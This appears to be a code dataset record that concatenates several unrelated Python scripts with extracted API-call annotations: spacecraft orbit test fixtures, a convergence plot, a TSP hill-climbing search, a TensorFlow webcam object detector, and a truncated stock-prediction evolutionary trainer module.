SpacecraftBus, Spacecraft\n'), ((14015, 14046), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc2_json'], {}), '(spc2_json)\n', (14035, 14046), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((14064, 14095), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc3_json'], {}), '(spc3_json)\n', (14084, 14095), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((22706, 24121), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['"""{"@id": "sp1", "name": "Mars", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }"""'], {}), '(\n \'{"@id": "sp1", "name": "Mars", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }\'\n )\n', (22726, 24121), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((24174, 24956), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['"""{"@id": 12, "name": "Jupyter", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }"""'], {}), '(\n \'{"@id": 12, "name": "Jupyter", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }\'\n )\n', (24194, 24956), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((25047, 28682), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['"""{"name": "Saturn", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "instrument": [ { "name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor" }, { "name": "Beta", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "SINGLE_ROLL_ONLY", "A_rollMin":10, "A_rollMax":15}, "mode": [{"@id":101, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}} ], "numberDetectorRows":5, "numberDetectorCols":10, "@type":"Basic Sensor" }, { "name": "Gamma", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":10 }, "maneuver":{"maneuverType": "Double_Roll_Only", "A_rollMin":10, "A_rollMax":15, "B_rollMin":-15, "B_rollMax":-10}, "mode": [{"@id":0, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}}, {"@id":1, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": 25}}, { "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": -25}} ], "numberDetectorRows":5, "numberDetectorCols":10, "@id": "bs3", "@type":"Basic Sensor" } ], "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }"""'], {}), '(\n \'{"name": "Saturn", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "instrument": [ { "name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor" }, { "name": "Beta", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "SINGLE_ROLL_ONLY", "A_rollMin":10, "A_rollMax":15}, "mode": [{"@id":101, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}} ], "numberDetectorRows":5, "numberDetectorCols":10, "@type":"Basic Sensor" }, { "name": "Gamma", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":10 }, "maneuver":{"maneuverType": "Double_Roll_Only", "A_rollMin":10, "A_rollMax":15, "B_rollMin":-15, "B_rollMax":-10}, "mode": [{"@id":0, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}}, {"@id":1, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": 25}}, { "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": -25}} ], "numberDetectorRows":5, "numberDetectorCols":10, "@id": "bs3", "@type":"Basic Sensor" } ], "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }\'\n )\n', (25067, 28682), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((2213, 2260), 'propcov.AbsoluteDate.fromJulianDate', 'propcov.AbsoluteDate.fromJulianDate', (['(2459270.75)'], {}), '(2459270.75)\n', (2248, 2260), False, 'import propcov\n'), ((2875, 2935), 'propcov.AbsoluteDate.fromGregorianDate', 'propcov.AbsoluteDate.fromGregorianDate', (['(2021)', '(2)', '(25)', '(6)', '(0)', '(0)'], {}), '(2021, 2, 25, 6, 0, 0)\n', (2913, 2935), False, 'import propcov\n'), ((5624, 5736), 'instrupy.util.Orientation.from_dict', 'Orientation.from_dict', (["{'referenceFrame': 'Nadir_pointing', 'convention': 'REF_FRAME_ALIGNED',\n '@id': 'abc'}"], {}), "({'referenceFrame': 'Nadir_pointing', 'convention':\n 'REF_FRAME_ALIGNED', '@id': 'abc'})\n", (5645, 5736), False, 'from instrupy.util import Orientation\n'), ((6100, 6198), 'instrupy.util.Orientation.from_dict', 'Orientation.from_dict', (["{'referenceFrame': 'Nadir_pointing', 'convention': 'REF_FRAME_ALIGNED'}"], {}), "({'referenceFrame': 'Nadir_pointing', 'convention':\n 'REF_FRAME_ALIGNED'})\n", (6121, 6198), False, 'from instrupy.util import Orientation\n'), ((6602, 6714), 'instrupy.util.Orientation.from_dict', 'Orientation.from_dict', (["{'referenceFrame': 'Nadir_pointing', 'convention': 'SIDE_LOOK',\n 'sideLookAngle': -10}"], {}), "({'referenceFrame': 'Nadir_pointing', 'convention':\n 'SIDE_LOOK', 'sideLookAngle': -10})\n", (6623, 6714), False, 'from instrupy.util import Orientation\n'), ((7161, 7316), 'instrupy.util.Orientation.from_dict', 'Orientation.from_dict', (["{'referenceFrame': 'EARTH_CENTERED_INERTIAL', 'convention': 'XYZ',\n 'xRotation': 10, 'yRotation': -10.4, 'zRotation': 20.78}"], {}), "({'referenceFrame': 'EARTH_CENTERED_INERTIAL',\n 'convention': 'XYZ', 'xRotation': 10, 'yRotation': -10.4, 'zRotation': \n 20.78})\n", (7182, 7316), False, 'from instrupy.util import Orientation\n'), ((10229, 10506), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }\'\n )\n', (10252, 10506), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((11204, 11535), 'orbitpy.util.OrbitState.from_json', 'OrbitState.from_json', (['"""{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}"""'], {}), '(\n \'{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}\'\n )\n', (11224, 11535), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((11697, 11974), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }\'\n )\n', (11720, 11974), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((12055, 12386), 'orbitpy.util.OrbitState.from_json', 'OrbitState.from_json', (['"""{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}"""'], {}), '(\n \'{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}\'\n )\n', (12075, 12386), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((12592, 12869), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }\'\n )\n', (12615, 12869), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((13546, 13877), 'orbitpy.util.OrbitState.from_json', 'OrbitState.from_json', (['"""{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}"""'], {}), '(\n \'{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}\'\n )\n', (13566, 13877), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((2334, 2382), 'propcov.Rvector6', 'propcov.Rvector6', (['[6878.137, 0, 0, 0, 7.6126, 0]'], {}), '([6878.137, 0, 0, 0, 7.6126, 0])\n', (2350, 2382), False, 'import propcov\n'), ((3026, 3040), 'numpy.deg2rad', 'np.deg2rad', (['(45)'], {}), '(45)\n', (3036, 3040), True, 'import numpy as np\n'), ((3042, 3056), 'numpy.deg2rad', 'np.deg2rad', (['(35)'], {}), '(35)\n', (3052, 3056), True, 'import numpy as np\n'), ((3058, 3073), 'numpy.deg2rad', 'np.deg2rad', (['(145)'], {}), '(145)\n', (3068, 3073), True, 'import numpy as np\n'), ((3075, 3090), 'numpy.deg2rad', 'np.deg2rad', (['(-25)'], {}), '(-25)\n', (3085, 3090), True, 'import numpy as np\n'), ((10545, 11161), 'instrupy.Instrument.from_json', 'Instrument.from_json', (['"""{"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}"""'], {}), '(\n \'{"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}\'\n )\n', (10565, 11161), False, 'from instrupy import Instrument\n')]
|
import numpy as np
import matplotlib.pyplot as plt
#plt.rc('font', family='serif')
#plt.rc('text', usetex=True)
sol1err = np.fromfile('../out/sol1err')
sol2err = np.fromfile('../out/sol2err')
L2err = np.sqrt(sol2err**2 + sol1err**2)
h = np.fromfile('../out/h')
x = np.sort(h)
fig, ax = plt.subplots(1,1)
for i in range(1,10):
hh = np.logspace(np.log10(min(h)), np.log10(max(h)), 2500)
b = np.log10(L2err[0]/(10**(i*np.log10(h[0]))))
y = 10**(i*np.log10(hh) + b)
mask = (y > min(L2err))
hh = hh[mask]
y = y[mask]
ax.loglog(hh, y, ':', label='$\propto (\Delta t)^{%d}$' % i)
ax.text(min(hh), min(y), str(i), ha='right', va='bottom')
ax.loglog(h, L2err, 'k.', label='results')
ax.set_xlabel('step size $(\Delta t)$')
ax.set_ylabel('$l_2$ error')
ax.legend()
ax.set_title('Convergence Test')
plt.tight_layout()
plt.show()
|
[
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.show",
"numpy.fromfile",
"numpy.sort",
"numpy.log10",
"matplotlib.pyplot.subplots",
"numpy.sqrt"
] |
[((124, 153), 'numpy.fromfile', 'np.fromfile', (['"""../out/sol1err"""'], {}), "('../out/sol1err')\n", (135, 153), True, 'import numpy as np\n'), ((164, 193), 'numpy.fromfile', 'np.fromfile', (['"""../out/sol2err"""'], {}), "('../out/sol2err')\n", (175, 193), True, 'import numpy as np\n'), ((202, 238), 'numpy.sqrt', 'np.sqrt', (['(sol2err ** 2 + sol1err ** 2)'], {}), '(sol2err ** 2 + sol1err ** 2)\n', (209, 238), True, 'import numpy as np\n'), ((239, 262), 'numpy.fromfile', 'np.fromfile', (['"""../out/h"""'], {}), "('../out/h')\n", (250, 262), True, 'import numpy as np\n'), ((267, 277), 'numpy.sort', 'np.sort', (['h'], {}), '(h)\n', (274, 277), True, 'import numpy as np\n'), ((289, 307), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (301, 307), True, 'import matplotlib.pyplot as plt\n'), ((826, 844), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (842, 844), True, 'import matplotlib.pyplot as plt\n'), ((845, 855), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (853, 855), True, 'import matplotlib.pyplot as plt\n'), ((460, 472), 'numpy.log10', 'np.log10', (['hh'], {}), '(hh)\n', (468, 472), True, 'import numpy as np\n'), ((427, 441), 'numpy.log10', 'np.log10', (['h[0]'], {}), '(h[0])\n', (435, 441), True, 'import numpy as np\n')]
|
import math
import random
import numpy
from tools import *
'''
Parametric Optimizers to search for optimal TSP solution.
Method 1: Stochastic Hill Climbing search
Method 2: Random Search - Used as benchmark
'''
# Initialize the population, a collection of paths
def createPath(m):
n = numpy.arange(1,m+1)
numpy.random.shuffle(n)
return n
# Perform a stochastic hill climbing search
def stochClimb(points,bound,inter):
p = len(points)
# ctr for fitness func. eval.
ctr = 0
# data taken at each i in inter
data = []
# best seen so far
maxfit = 0.0
while (ctr < bound):
# Path
v = createPath(p)
f = fitnessShort(v,points)
if (f > maxfit):
maxfit = f
ctr += 1
if (ctr in inter):
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# Create swap indices
o = numpy.arange(v.size)
i = numpy.arange(v.size)
while (ctr < bound):
climbed = False
numpy.random.shuffle(o)
numpy.random.shuffle(i)
for x in range(o.size):
for y in range(i.size):
swap(v,o[x],i[y])
shot = fitnessShort(v,points)
ctr += 1
if (shot <= f):
swap(v,o[x],i[y])
else:
f = shot
climbed = True
if (ctr in inter):
if (shot > maxfit):
maxfit = shot
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# If no improvement made, local optimum reached
# Return solution, otherwise keep trying to climb
if (not climbed):
break
else:
if (f > maxfit):
maxfit = f
# Perform a random search, used primarily for benchmarking
def randSearch(points,bound,inter):
p = len(points)
scores = []
best = 0.0
for x in range(1,bound+1):
z = createPath(p)
s = fitnessShort(z,points)
if (s > best):
best = s
if (x in inter):
scores.append(1.0/best)
return scores
|
[
"numpy.arange",
"numpy.random.shuffle"
] |
[((290, 312), 'numpy.arange', 'numpy.arange', (['(1)', '(m + 1)'], {}), '(1, m + 1)\n', (302, 312), False, 'import numpy\n'), ((312, 335), 'numpy.random.shuffle', 'numpy.random.shuffle', (['n'], {}), '(n)\n', (332, 335), False, 'import numpy\n'), ((840, 860), 'numpy.arange', 'numpy.arange', (['v.size'], {}), '(v.size)\n', (852, 860), False, 'import numpy\n'), ((869, 889), 'numpy.arange', 'numpy.arange', (['v.size'], {}), '(v.size)\n', (881, 889), False, 'import numpy\n'), ((943, 966), 'numpy.random.shuffle', 'numpy.random.shuffle', (['o'], {}), '(o)\n', (963, 966), False, 'import numpy\n'), ((973, 996), 'numpy.random.shuffle', 'numpy.random.shuffle', (['i'], {}), '(i)\n', (993, 996), False, 'import numpy\n')]
|
import cv2
import numpy as np
import os
# import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile
import pathlib
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from IPython.display import display
from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
def load_model(model_name):
model = tf.saved_model.load(
'/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/')
return model
PATH_TO_LABELS = '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/labelmap.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(
PATH_TO_LABELS, use_display_name=True)
model_name = 'saved_model.pb'
detection_model = load_model(model_name)
def run_inference_for_single_image(model, image):
image = np.asarray(image)
# The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
input_tensor = tf.convert_to_tensor(image)
# The model expects a batch of images, so add an axis with `tf.newaxis`.
input_tensor = input_tensor[tf.newaxis, ...]
# Run inference
model_fn = model.signatures['serving_default']
output_dict = model_fn(input_tensor)
# All outputs are batches tensors.
# Convert to numpy arrays, and take index [0] to remove the batch dimension.
# We're only interested in the first num_detections.
num_detections = int(output_dict.pop('num_detections'))
output_dict = {key: value[0, :num_detections].numpy()
for key, value in output_dict.items()}
output_dict['num_detections'] = num_detections
# detection_classes should be ints.
output_dict['detection_classes'] = output_dict['detection_classes'].astype(
np.int64)
# Handle models with masks:
if 'detection_masks' in output_dict:
# Reframe the the bbox mask to the image size.
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
output_dict['detection_masks'], output_dict['detection_boxes'],
image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(detection_masks_reframed > 0.5,
tf.uint8)
output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy()
return output_dict
def show_inference(model, frame):
# take the frame from webcam feed and convert that to array
image_np = np.array(frame)
# Actual detection.
output_dict = run_inference_for_single_image(model, image_np)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks_reframed', None),
use_normalized_coordinates=True,
line_thickness=2)
return(image_np)
video_capture = cv2.VideoCapture(0)
while True:
# Capture frame-by-frame
re, frame = video_capture.read()
Imagenp = show_inference(detection_model, frame)
cv2.imshow('object detection', Imagenp)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
# cv2.resize(Imagenp, (800,600)
|
[
"cv2.waitKey",
"tensorflow.convert_to_tensor",
"numpy.asarray",
"cv2.imshow",
"object_detection.utils.label_map_util.create_category_index_from_labelmap",
"cv2.VideoCapture",
"object_detection.utils.ops.reframe_box_masks_to_image_masks",
"tensorflow.cast",
"numpy.array",
"cv2.destroyAllWindows",
"tensorflow.saved_model.load"
] |
[((801, 894), 'object_detection.utils.label_map_util.create_category_index_from_labelmap', 'label_map_util.create_category_index_from_labelmap', (['PATH_TO_LABELS'], {'use_display_name': '(True)'}), '(PATH_TO_LABELS,\n use_display_name=True)\n', (851, 894), False, 'from object_detection.utils import label_map_util\n'), ((3196, 3215), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (3212, 3215), False, 'import cv2\n'), ((3471, 3494), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3492, 3494), False, 'import cv2\n'), ((522, 649), 'tensorflow.saved_model.load', 'tf.saved_model.load', (['"""/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/"""'], {}), "(\n '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/'\n )\n", (541, 649), True, 'import tensorflow as tf\n'), ((1032, 1049), 'numpy.asarray', 'np.asarray', (['image'], {}), '(image)\n', (1042, 1049), True, 'import numpy as np\n'), ((1148, 1175), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['image'], {}), '(image)\n', (1168, 1175), True, 'import tensorflow as tf\n'), ((2637, 2652), 'numpy.array', 'np.array', (['frame'], {}), '(frame)\n', (2645, 2652), True, 'import numpy as np\n'), ((3351, 3390), 'cv2.imshow', 'cv2.imshow', (['"""object detection"""', 'Imagenp'], {}), "('object detection', Imagenp)\n", (3361, 3390), False, 'import cv2\n'), ((2123, 2265), 'object_detection.utils.ops.reframe_box_masks_to_image_masks', 'utils_ops.reframe_box_masks_to_image_masks', (["output_dict['detection_masks']", "output_dict['detection_boxes']", 'image.shape[0]', 'image.shape[1]'], {}), "(output_dict['detection_masks'],\n output_dict['detection_boxes'], image.shape[0], image.shape[1])\n", (2165, 2265), True, 'from object_detection.utils import ops as utils_ops\n'), ((2322, 2371), 'tensorflow.cast', 'tf.cast', (['(detection_masks_reframed > 0.5)', 'tf.uint8'], {}), '(detection_masks_reframed > 0.5, tf.uint8)\n', (2329, 2371), True, 'import tensorflow as tf\n'), ((3398, 3412), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3409, 3412), False, 'import cv2\n')]
|
"""
"""
from configparser import ConfigParser, SectionProxy
from os import path
import os
from typing import List, Tuple, Any, Optional, Dict
import numpy as np
import tqdm
from general_utils.config import config_util, config_parser_singleton
from general_utils.exportation import csv_exportation
from general_utils.logging import logger
from data_providing_module import configurable_registry, data_provider_registry
from data_providing_module.data_providers import data_provider_static_names
from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation
CONSUMER_ID = "Evolutionary Computation Trainer"
_ENABLED_CONFIGURATION_IDENTIFIER = 'enabled'
_EXAMPLE_COMBINATION_FACTOR_IDENTIFIER = 'Periods Per Example'
_TDP_BLOCK_LENGTH_IDENTIFIER = "trend deterministic data provider block length"
_NUM_EPOCHS_IDENTIFIER = "Number of Epochs"
_NUM_INDIVIDUALS_IDENTIFIER = "Number of Individuals in Evolutionary Population"
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER = "Model Saving Epoch Interval"
_TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER = "Days Per Example"
_MUTATION_CHANCE_IDENTIFIER = "Mutation Chance Per Genome"
_MUTATION_MAGNITUDE_IDENTIFIER = "Mutation Magnitude"
_CROSSOVER_CHANCE_IDENTIFIER = "Crossover Chance Per Genome"
_CONFIGURABLE_IDENTIFIERS = [_ENABLED_CONFIGURATION_IDENTIFIER, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER,
_TDP_BLOCK_LENGTH_IDENTIFIER, _NUM_EPOCHS_IDENTIFIER, _NUM_INDIVIDUALS_IDENTIFIER,
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER, _TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER,
_MUTATION_CHANCE_IDENTIFIER, _MUTATION_MAGNITUDE_IDENTIFIER, _CROSSOVER_CHANCE_IDENTIFIER]
_CONFIGURATION_DEFAULTS = ['False', '22', '2520', '100', '100', '5', '5', '.1', '.15', '.5']
def string_serialize_predictions(predictions) -> str:
ret_str = ""
ticker_prediction_template = "{}:{}\n"
individual_prediction_template = "{}:\n\t\tBuy: {}\n\t\tSell: {}\n\t\tAccuracies: {:.2f}, {:.2f}"
for ticker, data in predictions.items():
ticker_predictions, accuracies = data
serialized_individual_predictions = []
for i in range(len(ticker_predictions)):
indicate_buy = ticker_predictions[i][0] == 1
indicate_sell = ticker_predictions[i][1] == 1
serialized_individual_predictions.append(
individual_prediction_template.format(i+1, indicate_buy, indicate_sell,
accuracies[i][0], accuracies[i][1])
)
expanded_template = ticker_prediction_template.format(ticker, "\n\t{}" * len(ticker_predictions))
ret_str += expanded_template.format(*serialized_individual_predictions)
return ret_str
def export_predictions(predictions, output_dir) -> None:
out_file = output_dir + path.sep + "ec.csv"
exportation_columns = []
for ticker, prediction_data in predictions.items():
actual_predictions, observed_accuracies = prediction_data
actual_predictions = np.where(actual_predictions == 1, True, False)
exportation_columns.append((ticker, "", ""))
for i in range(len(actual_predictions)):
exportation_columns.append((",Model:", str(i)))
exportation_columns.append((",Buy:", str(actual_predictions[i][0])))
exportation_columns.append((",Buy Accuracy:", str(observed_accuracies[i][0])))
exportation_columns.append((",Sell:", str(actual_predictions[i][1])))
exportation_columns.append((",Sell Accuracy:", str(observed_accuracies[i][1])))
with open(out_file, 'w') as handle:
for column in exportation_columns:
handle.write(",".join(column) + '\n')
def prediction_truth_calculation(predictions: List[np.ndarray],
closing_prices: List[float],
num_days_per_prediction: int = 5):
prediction_entry = Tuple[List[np.ndarray], float, List[List[bool]]]
